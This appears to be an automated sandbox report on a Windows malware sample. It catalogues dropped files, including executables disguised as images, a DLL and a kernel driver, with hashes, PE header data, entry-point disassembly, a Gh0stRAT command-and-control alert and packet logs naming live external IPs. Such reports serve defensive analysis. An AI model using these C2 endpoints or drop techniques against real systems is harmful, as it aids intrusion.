SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\c[1].gif

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\7tqorj.exe

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938755349516
Encrypted:	true
SSDEEP:	98304:QAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:7ndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	43DE3D9240BC9EFF46E37A21DF2A5968
SHA1:	061C42B2B9DE7509D32267F9A2E58D46A7D3209F
SHA-256:	CB165C8CF8A42EE8FFA1F5FEF2E8E2323F4C9CEA054D7BEA5F0547D4EEDE2A2B
SHA-512:	70036157A7772B5EEE5F82F7DA5819105E9D094722B97FB76096556E04E6B462F2F671256B992412DFB48FEC3D7024EA2004CA1565C0E4F2AD9726058CFB22B5
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q/.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978936157803007
Encrypted:	false
SSDEEP:	192:/Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:/BuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	BA3D8FF6AE27DF65E34515D3993E22E3
SHA1:	2C24AAACACD63700866909501AB532346EADE9BD
SHA-256:	94C945D034C63A02817B7CA16B7BE9A4BFC26AB3461323ED9B31D99F7ADA31AB
SHA-512:	5F2A20231B890B08E3EEC0E12E68EB8F12793E4BF26BC1976FA5670A7A7F0AF353FE0B16F12F600A29F7DE9B336BDB044F17FBBA6CA4E02C1B1B9EEAC2311C64
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.0020684822150825
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fe:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5ge
MD5:	DE1A402C0336BE65B84DB0B73BAEE49B
SHA1:	89728AF0776D907A9415F313658D8F32BCB434BF
SHA-256:	74EA27DF8450DC259BBFB94C84740415E51606E07CA954C80D7209AE38FECFDE
SHA-512:	DD818C23F8BE4DF0076EAAE40C224D8D762B147CE15E5F362AB109BEBFDD935A6B4580D09910CAAD64BDF98C6AF003CC2AD5AB467A670690956030A512C30FDB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.228874608676476
Encrypted:	false
SSDEEP:	384:M3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/Z:MOUkgfdZ9pRyv+uPzCMHo3q4tDghT
MD5:	7E9CCF55E523A3D53F71670F33490252
SHA1:	592AF92C23EF53669E28370F95DD002C6BDBEC81
SHA-256:	FF12D710D42E4F461E10177BDDACA2249D8225A493CA11081E39CE8084AABB74
SHA-512:	D470F922061EC8A7A1274A069F76D50FE7604EAD781A0A3DF2383418D873048634AB146B866FFACDBB1D7EC2FBB8D2B836F52E1FD72022FB66D9B9697EFB22D5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................w..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.443567906829903
Encrypted:	false
SSDEEP:	3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKzn3:ri9HHTwPYtyjtOsV39YBPZaoiwH
MD5:	BB9D1B9FDA8E749C96539DB611C23C24
SHA1:	0C64FDD80A0A07AAEFDE7CD39570752931A23291
SHA-256:	7292EEC2ACFF791FF5988D1C88DCF0CC90D88E103556F0F2169235B789EF0107
SHA-512:	A0D3A9BD7FD0E69BEF479F0D5B30E2C20D4A9BF6ECC8FE828F2B514B41B460EACB5BFC3C6D8E2A4E20282ABD34BB9711DD854F150202DF7AA93DB9B80FB9F87A
Malicious:	false
Preview:	..........<.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............3.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ..........x.\|.^>._

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	0.08192237708325625
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2749837485743-7684385786.05.exe
File size:	30'885'376 bytes
MD5:	5b695fabfcd1da54f7c193ef5f11ef6a
SHA1:	8097a65d6e89522851b53b831aaf45afb9f0267b
SHA256:	697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
SHA512:	1f917fbed3c8a8b0d4896ed2dddd4040fb91565ee40c7513ebccd0ebd0371a860fcb5b1cb63fbfdbfa6ed2869cbaa400a27afbdeb47c78d4539579dc738ef37a
SSDEEP:	3072:yBz0z6OFlTEzEQUZFtabsn8cZ1YQpjZoSc2faC1r/wDJPjYR+rH/:yd0GulTEo3tao8k1xv3aC1r+jYR+T
TLSH:	77679F5A326410F9D5BFD178C9A20A46D772B866437293CF063446AADF337D0AD3B362
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C+...J...J...J....O..J...2B..J...J..zJ....z."J....{.jJ....K..J....L..J..Rich.J..........................PE..d...i..N..........#

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140008c38
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4EF3A569 [Thu Dec 22 21:47:21 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	e055d655d830344970c4208138facfc1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F6BC0B5CAB4h
dec eax
add esp, 28h
jmp 00007F6BC0B5059Eh
int3
int3
dec eax
mov dword ptr [000146F5h], ecx
ret
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esp
dec eax
lea ebp, dword ptr [esp-000004F0h]
dec eax
sub esp, 000005F0h
dec eax
mov eax, dword ptr [00012AF8h]
dec eax
xor eax, esp
dec eax
mov dword ptr [ebp+000004E0h], eax
inc ecx
mov edi, eax
mov esi, edx
mov ebx, ecx
cmp ecx, FFFFFFFFh
je 00007F6BC0B58167h
call 00007F6BC0B5CB16h
and dword ptr [esp+70h], 00000000h
dec eax
lea ecx, dword ptr [esp+74h]
xor edx, edx
inc ecx
mov eax, 00000094h
call 00007F6BC0B578DBh
dec esp
lea ebx, dword ptr [esp+70h]
dec eax
lea eax, dword ptr [ebp+10h]
dec eax
lea ecx, dword ptr [ebp+10h]
dec esp
mov dword ptr [esp+48h], ebx
dec eax
mov dword ptr [esp+50h], eax
call dword ptr [0000D581h]
dec esp
mov esp, dword ptr [ebp+00000108h]
dec eax
lea edx, dword ptr [esp+40h]
dec ecx
mov ecx, esp
inc ebp
xor eax, eax
call 00007F6BC0B643EDh
dec eax
test eax, eax
je 00007F6BC0B58199h
dec eax
and dword ptr [esp+38h], 00000000h
dec eax
mov edx, dword ptr [esp+40h]
dec eax
lea ecx, dword ptr [esp+60h]
dec eax
mov dword ptr [esp+30h], ecx
dec eax
lea ecx, dword ptr [esp+58h]
dec esp
mov ecx, eax

Rich Headers

Programming Language:

[ASM] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a314	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d7a000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d79000	0xfb4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16440	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x3d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1424e	0x14400	2818c01f5b3619f5d08841e50f9f34ae	False	0.5304542824074074	data	6.38689177603382	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x4fb2	0x5000	b5004cfda8e71f2299dfabff87abc568	False	0.343359375	data	4.861556529219821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1d5d600	0x1d59800	c3446221fb4627522fbc3e5c902154fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d79000	0xfb4	0x1000	a1ff09aebd65854c71ab76238d270b83	False	0.485595703125	data	4.980072699437705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1d7a000	0x5c8	0x600	56a4da9c71a7d95e35ee0ccb4e062a95	False	0.419921875	data	4.212061586306468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1d7a0a0	0x3cc	data	English	United States	0.411522633744856
RT_MANIFEST	0x1d7a46c	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
KERNEL32.dll	DisconnectNamedPipe, ConnectNamedPipe, ReadFile, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, IsBadStringPtrW, WideCharToMultiByte, SetThreadPriority, GetCurrentThread, CreateNamedPipeW, Sleep, InitializeCriticalSection, DeleteCriticalSection, SetPriorityClass, GetCurrentProcess, FreeLibrary, CreateFileW, LoadLibraryA, EnterCriticalSection, GetProcessHeap, SetEndOfFile, GetStringTypeW, LCMapStringW, SetFilePointer, MultiByteToWideChar, WriteConsoleW, HeapReAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetLastError, WaitNamedPipeW, CloseHandle, GetSystemTime, GetTempPathW, GetProcAddress, GetModuleFileNameW, GetConsoleMode, GetConsoleCP, SetStdHandle, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, LeaveCriticalSection, WriteFile, FlushFileBuffers, ExitThread, ResumeThread, CreateThread, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, TerminateProcess, HeapFree, HeapAlloc, RaiseException, RtlPcToFileHeader, RtlUnwindEx, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, LoadLibraryW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, GetVersion, HeapCreate, VirtualAlloc
USER32.dll	wsprintfW, PostMessageW, MessageBoxW, PostQuitMessage, DefWindowProcW, EndPaint, GetMessageW, TranslateMessage, DispatchMessageW, CreateWindowExW, ShowWindow, UpdateWindow, RegisterClassExW, BeginPaint
GDI32.dll	StartDocW, StartPage, EndPage, EndDoc, DeleteDC, CreateDCW
WINSPOOL.DRV	ClosePrinter, DocumentPropertiesW, GetPrinterDriverW, OpenPrinterW
ADVAPI32.dll	SetSecurityDescriptorDacl, GetUserNameW, InitializeSecurityDescriptor

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T04:51:51.032072+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.6	50000	8.217.59.73	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 04:50:35.963324070 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:35.963365078 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:35.963442087 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:35.974822998 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:35.974836111 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.167665005 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.167736053 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.168438911 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.168593884 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.244149923 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.244170904 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.244529009 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.244576931 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.247033119 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.287328959 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.570020914 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.570103884 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.570126057 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.570157051 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.577723026 CET	49921	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.577743053 CET	443	49921	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.658567905 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.658617020 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:37.658683062 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.659728050 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:37.659742117 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:38.832200050 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:38.835877895 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:38.837440014 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:38.837445974 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:38.837719917 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:38.837723970 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.174518108 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.174540043 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.174624920 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.174635887 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.174719095 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.174808979 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.174858093 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.176261902 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.176325083 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.179821014 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.179914951 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.261192083 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.261255980 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.261557102 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.261595011 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.261604071 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.261610985 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.261645079 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.261661053 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.262397051 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.262439013 CET	443	49931	39.103.20.26	192.168.2.6
